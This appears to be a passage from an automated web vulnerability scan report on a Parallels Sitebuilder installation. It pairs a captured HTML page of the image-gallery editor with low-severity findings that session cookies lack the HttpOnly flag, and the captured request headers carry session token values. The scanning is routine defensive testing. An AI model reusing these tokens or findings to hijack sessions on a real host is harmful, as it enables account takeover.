<img id="b1ynn2c224eState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="b1ynn2c224eLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="b1ynn2c224eCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="b1ynn2c224eIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="b1ynn2c224eSpan" style="vertical-align: middle;">My Family</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'b1ynn2c224e', 'page3.php', 'Simple', '', '', 'visible');
       </script><div id="1iqsyi3rp1o" valign="middle">
<img id="1iqsyi3rp1oState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="1iqsyi3rp1oLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="1iqsyi3rp1oCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="1iqsyi3rp1oIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/modules/ImageGallery/images/icon.gif"><span id="1iqsyi3rp1oSpan" style="vertical-align: middle;">Photos</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', '1iqsyi3rp1o', 'page4.php', 'ImageGallery', 'true', '', 'visible');
       </script><div id="1mhpsivotpo" valign="middle">
<img id="1mhpsivotpoState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="1mhpsivotpoLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="1mhpsivotpoCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="1mhpsivotpoIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="1mhpsivotpoSpan" style="vertical-align: middle;">Resume</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', '1mhpsivotpo', 'page5.php', 'Simple', '', '', 'visible');
       </script><div id="q05ufw2vwxb" valign="middle">
<img id="q05ufw2vwxbState" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="q05ufw2vwxbLine" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="q05ufw2vwxbCheck" type="checkbox" style="display: inline; vertical-align: middle;"><img id="q05ufw2vwxbIcon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="q05ufw2vwxbSpan" style="vertical-align: middle;">Favorite Links</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'q05ufw2vwxb', 'page6.php', 'Simple', '', '', 'visible');
       </script><div id="pp2btyiv601" valign="middle">
<img id="pp2btyiv601State" border="0" width="19px" align="middle" src="/images/blank.gif"><img id="pp2btyiv601Line" border="0" width="19px" align="middle" src="/images/blank.gif"><input id="pp2btyiv601Check" type="checkbox" style="display: inline; vertical-align: middle;"><img id="pp2btyiv601Icon" border="0" width="16" height="16" style="display: inline; vertical-align: middle;" src="/skins/WinXPReloadedCompact/icons/HTMLPageIcon.gif"><span id="pp2btyiv601Span" style="vertical-align: middle;">Contact Me</span>
</div>
<script type="text/javascript" language="javascript">
           SbInitNode('edit', 'pp2btyiv601', 'page7.php', 'Simple', '', '', 'visible');
       </script>
</div>
<script type="text/javascript" language="javascript"></script>
</td></tr></table>
<script type="text/javascript" language="javascript">
                           var knownPagesFileNames = new Array('index');
                           knownPagesFileNames.push('page1');

       registerPageEditView('q485ez4jvyq', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page2');

       registerPageEditView('hwal3pvmvz3', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page3');

       registerPageEditView('b1ynn2c224e', '/Wizard/Edit/Html');


       registerPageEditView('1iqsyi3rp1o', '/Wizard/Edit/Modules/ImageGallery');
       knownPagesFileNames.push('page5');

       registerPageEditView('1mhpsivotpo', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page6');

       registerPageEditView('q05ufw2vwxb', '/Wizard/Edit/Html');
       knownPagesFileNames.push('page7');

       registerPageEditView('pp2btyiv601', '/Wizard/Edit/Html');
       </script>
</td></tr>
<tr class="sb-edit-panel-block"><td class="sb-edit-panel-block-border" id="pageInfoTd" valign="top" height="1">
<script>
           sbNavigationObject.registerOnSubmitFunction(validateForm);
       </script><table height="160px" width="100%" border="0" cellpadding="0" cellspacing="0" style="table-layout: fixed;">
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page title</span><span style="color:Red; width: 10px;">*</span><br><input id="pageTitle" name="pageTitle" type="text" maxlength="255" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:100%;" onchange="self.sbApplyChangesObject.registerChange();" value="Photos">
</td></tr>
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page file name</span><span style="color:Red; width: 10px;">*</span><br><input id="pageFileName" name="pageFileName" type="text" maxlength="255" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:140px;" onchange="self.sbApplyChangesObject.registerChange();" value="page4"><span class="sb-text">.php</span>
</td></tr>
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page keywords</span><br><textarea id="pageKeywords" name="pageKeywords" rows="2" cols="20" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:100%;" onchange="self.sbApplyChangesObject.registerChange();"></textarea>
</td></tr>
<tr><td style="padding-bottom: 5px;">
<span class="sb-text">Page description</span><br><textarea id="pageDescription" name="pageDescription" rows="2" cols="20" class="sb-text" style="border-color:#999EA1;border-width:1px;border-style:Solid;width:100%;" onchange="self.sbApplyChangesObject.registerChange();"></textarea>
</td></tr>
<tr><td>
<span style="color:Red; padding-right: 5px;">*</span><span class="sb-text">Required fields</span><br>
</td></tr>
<tr><td style="height: 20px;"><img width="100%" height="1" src="/skins/WinXPReloadedCompact/images/line.gif"></td></tr>
<tr><td><table cellpadding="0" cellspacing="0" border="0" class="control-input-title"><tr>
<td class="input-block"><input id="pageShowInNavigation" type="checkbox" name="pageShowInNavigation" onchange="self.sbApplyChangesObject.registerChange();" class="sb-check" checked></td>
<td class="title-block"><label class="name" for="pageShowInNavigation">Show this page in site map</label></td>
</tr></table></td></tr>
<tr><td align="center" style="padding-top: 10px">
<table cellpadding="0" cellspacing="0" border="0" style="
                       filter:alpha(opacity=40); opacity: 0.4;
                       width: 100%" class="" id="plainPageButton" onclick=""><tr>
<td align="right" style="padding:0px;"><img src="/skins/WinXPReloadedCompact/images/button_left.gif" style="border-width:0px;" alt=""></td>
<td class="sb-button-disabled" style="white-space: nowrap; text-align: center; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); padding: 0px; padding-right: 4px;padding-left: 4px;" id="plainPageButtonMainText">Remove Design Template</td>
<td align="left" style="padding: 0px;"><img src="/skins/WinXPReloadedCompact/images/button_right.gif" style="border-width:0px;" alt=""></td>
</tr></table>
<input type="hidden" id="isPlainPage" name="isPlainPage" value="0">
</td></tr>
</table>
<input type="hidden" name="currentPageId" id="page" value="1iqsyi3rp1o">
</td></tr>
</table></div></td>
<td style="height: 100%;" class="sb-edit-panel-hidebackground" id="LeftPanelDiv_Bar"><div id="ButtonHideTree" onclick="toggleLeftPanel('/skins/WinXPReloadedCompact/images/right.gif', '/skins/WinXPReloadedCompact/images/left.gif');" align="center" style="width: 21px; height: 100%; border: 0px solid #7D7D7D; float: left; cursor: hand; cursor: pointer;">
<img id="LeftPanelDiv_bullet" class="sb-edit-panel-arrow" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/left.gif"><br><img id="LeftPanelDiv_Text" style="border-width:0px;" src="/localizedimage.php?localeCode=en_US&section=Wizard_Edit&key=hideSiteMap">
</div></td>
</tr></table>
</td>
<td valign="top" style="width: 100%; height: 100%">
<div class="sb-edit-modulename">
<img style="border-width:0px;" src="/modules/ImageGallery/images/icon.gif"><span class="sb-page-title" style="padding-left: 9px;">Image Gallery</span>
</div>
<table class="sb-formtable" cellspacing="0" border="0" style="border-collapse:collapse;height: 99%; width: 100%;"><tr><td valign="top">
<input type="hidden" name="tab" value="image_upload"><input type="hidden" name="pageNum" value=""><input type="hidden" name="pageSize" value=""><input type="hidden" name="orderBy" value=""><input type="hidden" name="orderType" value=""><input type="hidden" name="viewAction" id="viewAction" value="/Wizard/Edit"><table class="sb-formtable" cellpadding="0" cellspacing="0" width="100%" border="0">
<tr class="sb-formtableheader"><th valign="bottom" align="left" class="sb-formtableheader-th" style="width: 100%;"><table style="width:100%;" cellpadding="0" cellspacing="0" border="0" class="sb-formtable"><tr><td valign="top" style="width:100%;"><table border="0" cellspacing="0" cellpadding="0"><tr>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:default;width:10px; height: 21px;" class="TabLabelSelectedStyle" id="image_management" onclick="javascript:tabPanelToggle('sb_panel', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOn.gif" alt="" id="image_management_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOn.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="image_management_T">Images</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOn.gif" id="image_management_IR" alt=""></td>
</tr></table></td>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:pointer;width:10px;height: 21px;" class="TabLabelDefaultStyle" id="categories" onclick="javascript:tabPanelToggle('sb_panel', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOff.gif" alt="" id="categories_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOff.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="categories_T">Categories</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOff.gif" id="categories_IR" alt=""></td>
</tr></table></td>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:pointer;width:10px;height: 21px;" class="TabLabelDefaultStyle" id="settings" onclick="javascript:tabPanelToggle('sb_panel', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOff.gif" alt="" id="settings_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOff.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="settings_T">Settings</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOff.gif" id="settings_IR" alt=""></td>
</tr></table></td>
</tr></table></td></tr></table></th></tr>
<tr><td style="padding: 10px;" class="sb-page">
<div style="display:block;" id="image_managementContent">
<script src="/modules/ImageGallery/js/imageManagement.js?5.0.0.2009110318" type="text/javascript"></script><fieldset>
<legend>Tools</legend>
<div class="fieldset-block"><table cellspacing="0" border="0" style="border-collapse:collapse;"><tr>
<td valign="top"><table cellpadding="0" cellspacing="0" border="0" class="sb-button-tool-table" onclick='javascript: self.sbApplyChangesObject.registerForcedSaving();sbNavigationObject.go("/Wizard/Edit/Modules/ImageGallery/ImageUpload");' style="cursor: pointer; width: 80px;">
<tr>
<td rowspan="2" style="width:0;"></td>
<td align="center" valign="middle"><img border="0" alt="" src="/skins/WinXPReloadedCompact/icons/AddImage.png"></td>
</tr>
<tr><td align="center" class="sb-button-tool-text">Image Upload</td></tr>
</table></td>
<td valign="top"><table cellpadding="0" cellspacing="0" border="0" class="sb-button-tool-table" onclick='javascript: self.sbApplyChangesObject.registerForcedSaving();sbNavigationObject.go("/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload");' style="cursor: pointer; width: 80px;">
<tr>
<td rowspan="2" style="width:0;"></td>
<td align="center" valign="middle"><img border="0" alt="" src="/skins/WinXPReloadedCompact/icons/AddImage.png"></td>
</tr>
<tr><td align="center" class="sb-button-tool-text">Multiple Image Upload</td></tr>
</table></td>
</tr></table></div>
</fieldset>
<script type="text/javascript" src="/js/list.js?5.0.0.2009110318"></script><script language="javascript">
function pagedListDoSort(tab, orderBy, orderType) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.action = '/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload';
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.orderBy.value = orderBy;
   form.orderType.value = orderType;
   form.submit();
}
</script><fieldset>
<legend>Images</legend>
<div class="fieldset-block">
<div class="list-tool-block"><table cellspacing="0" cellpadding="0" border="0" class="link-button-container"><tr>
<td class="link-button-image-area"><a href="#" onclick="deleteImages()"><img border="0" alt="" src="/skins/WinXPReloadedCompact/icons/delete.png"></a></td>
<td class="link-button-text-area"><a href="#" style="color: Black;" onclick="deleteImages()">Remove Selected</a></td>
</tr></table></div>
<div class="clear"></div>
<table cellpadding="0" cellspacing="0" border="0"><tr>
<td>
<script language="javascript">
function pagedListChangeFilter(tab) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.action = '/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload';

   form.submit();
}
</script><table cellpadding="0" cellspacing="0" border="0" class="list-show-container"><tr>
<td class="list-show-view-text-area"><label class="name" for="image_managementfilterValue"></label></td>
<td class="list-show-view-list-area"><select id="image_managementfilterValue" name="image_managementfilterValue" onchange="pagedListChangeFilter('image_management');"><option value="allCategories">All</option>
<option value="noCategories">Not categorized</option>
<option value="1">Category1</option>
<option value="2">Category2</option></select></td>
</tr></table>
</td>
<td>
<script language="javascript">
function pagedListShowAll(tab) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.action = '/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload';

   if (form.filterValue) {
       form.filterValue.selectedIndex = 0;
   }
   form.elements[tab+'searchString'].value='';
   form.submit();
}
function pagedListSearchItems(tab) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.action = '/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload';

   form.submit();
}
function pagedListChangeFilter(tab) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.action = '/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload';

   form.submit();
}
</script><table cellpadding="0" cellspacing="0" border="0" class="list-show-container"><tr>
<td class="list-show-search-input-area"><input type="text" size="25" maxlength="255" class="sb-input" name="image_managementsearchString"></td>
<td class="list-show-search-tool-area"><table cellpadding="0" cellspacing="0" border="0" type="button" style="cursor:pointer;" class="link-button-container" onclick="pagedListSearchItems('image_management');"><tr>
<td class="link-button-image-area"><img src="/skins/WinXPReloadedCompact/icons/search.png" alt=""></td>
<td class="link-button-text-area"><span style="text-decoration: underline;">Search</span></td>
</tr></table></td>
<td class="list-show-showall-tool-area"><table cellpadding="0" cellspacing="0" border="0" type="button" name="ImageButtonShowAll" style="cursor:pointer;" class="link-button-container" onclick="pagedListShowAll('image_management');"><tr>
<td class="link-button-image-area"><img src="/skins/WinXPReloadedCompact/icons/showall.png" alt=""></td>
<td class="link-button-text-area"><span style="text-decoration: underline;">Show All</span></td>
</tr></table></td>
</tr></table>
</td>
</tr></table>
<script language="javascript">
function pagedListGotoPage(tab, pageNum) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = pageNum;
   form.submit();
}
function pagedListSetPageSize(tab, pageSize) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.pageSize.value = pageSize;
   form.submit();
}
</script><table width="100%" cellspacing="0" cellpadding="0" border="0" class="list-pager-container"><tr>
<td class="list-pager-total-area">3..records total</td>
<td class="list-pager-go-area"></td>
<td class="list-pager-numbers-area">Number of entries per page:..
       <a href="javascript:pagedListSetPageSize('image_management',5);">5</a>..
       <strong>10</strong>..
       <a href="javascript:pagedListSetPageSize('image_management',25);">25</a>..
       <a href="javascript:pagedListSetPageSize('image_management',100);">100</a>
</td>
</tr></table>
<div class="scroll-table"><table cellspacing="0" cellpadding="0" border="0" class="list-table">
<tr class="fixed">
<th style="width:1%;"><div><input type="checkbox" name="globalCheck" onclick="setImageCheckboxStatus(this.checked);" class="check"></div></th>
<th style="width:1%;"><div>P</div></th>
<th scope="col"><div>Name</div></th>
<th scope="col"><div>Categories</div></th>
<th scope="col"><div>Dimension</div></th>
<th scope="col"><div>Size (KB)</div></th>
<th style="width:1%;text-align:center; " scope="col"><div>Edit</div></th>
</tr>
<tr class="list-table-row">
<td style="width:1%;"><input type="checkbox" name="imageId[]" class="check" value="1"></td>
<td><a href="#" onclick="window.open('/Wizard/Edit/Modules/Image?file=data/storage/attachments/276e6d26f703339c19673c83a6febf28.jpg', 'imagepreview', 'width=497, height=657, resizable=yes, tolbar=no, status=yes, scrollbars=yes');return false;"><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/icons/prew.png"></a></td>
<td style="text-align:;">Image1</td>
<td style="text-align:;"></td>
<td style="text-align:;">480x640</td>
<td style="text-align:;">48.89</td>
<td style="width:1%; text-align:center; "><a href="#" onclick="
                       self.sbApplyChangesObject.registerForcedSaving();
                       sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/Image/Edit?id=1');
                   "><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/icons/editsiteinwizard.png"></a></td>
</tr>
<tr class="list-table-row-alter">
<td style="width:1%;"><input type="checkbox" name="imageId[]" class="check" value="2"></td>
<td><a href="#" onclick="window.open('/Wizard/Edit/Modules/Image?file=data/storage/attachments/7f1189d907afe728b38592d8e8cbb3db.jpg', 'imagepreview', 'width=497, height=657, resizable=yes, tolbar=no, status=yes, scrollbars=yes');return false;"><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/icons/prew.png"></a></td>
<td style="text-align:;">Image2</td>
<td style="text-align:;"></td>
<td style="text-align:;">480x640</td>
<td style="text-align:;">22.61</td>
<td style="width:1%; text-align:center; "><a href="#" onclick="
                       self.sbApplyChangesObject.registerForcedSaving();
                       sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/Image/Edit?id=2');
                   "><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/icons/editsiteinwizard.png"></a></td>
</tr>
<tr class="list-table-row">
<td style="width:1%;"><input type="checkbox" name="imageId[]" class="check" value="3"></td>
<td><a href="#" onclick="window.open('/Wizard/Edit/Modules/Image?file=data/storage/attachments/5d66efcd885929ce2577664b29230f0d.jpg', 'imagepreview', 'width=497, height=657, resizable=yes, tolbar=no, status=yes, scrollbars=yes');return false;"><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/icons/prew.png"></a></td>
<td style="text-align:;">Image3</td>
<td style="text-align:;"></td>
<td style="text-align:;">480x640</td>
<td style="text-align:;">23.35</td>
<td style="width:1%; text-align:center; "><a href="#" onclick="
                       self.sbApplyChangesObject.registerForcedSaving();
                       sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/Image/Edit?id=3');
                   "><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/icons/editsiteinwizard.png"></a></td>
</tr>
</table></div>
<script language="javascript">
function pagedListGotoPage(tab, pageNum) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = pageNum;
   form.submit();
}
function pagedListSetPageSize(tab, pageSize) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.pageSize.value = pageSize;
   form.submit();
}
</script><table width="100%" cellspacing="0" cellpadding="0" border="0" class="list-pager-container"><tr>
<td class="list-pager-total-area">3..records total</td>
<td class="list-pager-go-area"></td>
<td class="list-pager-numbers-area">Number of entries per page:..
       <a href="javascript:pagedListSetPageSize('image_management',5);">5</a>..
       <strong>10</strong>..
       <a href="javascript:pagedListSetPageSize('image_management',25);">25</a>..
       <a href="javascript:pagedListSetPageSize('image_management',100);">100</a>
</td>
</tr></table>
<script type="text/javascript" language="javascript">
                       observeCheckboxesClick('Ids[]',
                           'Top'
                       );
                       observeListRowsHighlight();
                   </script>
</div>
</fieldset>
</div>
<div style="display:none;" id="categoriesContent"></div>
<div style="display:none;" id="settingsContent"></div>
</td></tr>
<tr class="sb-formtablefooter"><th style="width: 100%;">..</th></tr>
</table>
<script type="text/javascript">imgPath='/skins/WinXPReloadedCompact/images/';</script><script type="text/javascript" src="/js/tabpanel.js?5.0.0.2009110318"></script><script type="text/javascript">sb_panel = new TabPanel();
           sb_panel.setupAllPages();
       </script>
</td></tr></table>
</td>
</tr></table></td></tr></table>
</td></tr>
<tr id="TRFooter"><td colspan="2"><table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-footer-container"><tr><td class="sb-footer"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;"><tr>
<td><table border="0" cellpadding="0" cellspacing="5" style="height: 100%; padding: 5px 0;"><tr><td class="sb-footer-text" style="white-space: nowrap;padding-left: 15px;">
                                       .... Copyright 2004-2009 Parallels All Rights Reserved.</td></tr></table></td>
<td align="right" style="padding-right: 10px;"><table cellpadding="0" cellspacing="0"><tr>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" value="Back" style="cursor:pointer;" onclick="return sbNavigationObject.go('/Wizard/Pages');"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/go_back_l.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_back_bullet.gif"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Back</td>
<td><img src="/skins/WinXPReloadedCompact/images/go_back_r.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" value="Preview" style="cursor: pointer;" onclick="sbNavigationObject.setViewParam('preview','show');sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload');sbNavigationObject.unsetViewParam('preview');"><tr>
<td style="width:0px;"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_preview_bullet.gif"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Preview</td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" value="Forward" style="cursor:pointer;" onclick="return sbNavigationObject.go('/Wizard/Publish');"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/go_next_l.gif" border="0"></td>
<td background="/skins/WinXPReloadedCompact/images/go_bg.gif" style="padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_next_bullet.gif" border="0"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Next</td>
<td><img src="/skins/WinXPReloadedCompact/images/go_next_r.gif" border="0"></td>
</tr></table></td>
</tr></table></td>
</tr></table></td></tr></table></td></tr>
</table>
</form>
</body>
</html>

3.18. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Overview previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Overview

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Overview HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Tue, 12 Oct 2010 01:05:42 GMT
Connection: close

3.19. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Pages previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Pages

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Pages HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Tue, 12 Oct 2010 01:05:20 GMT
Connection: close

3.20. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Publish previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Publish

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Publish HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Tue, 12 Oct 2010 01:05:35 GMT
Connection: close

3.21. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Start previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:	/Wizard/Start

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=42b54cb11fc3aedbd; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Start HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
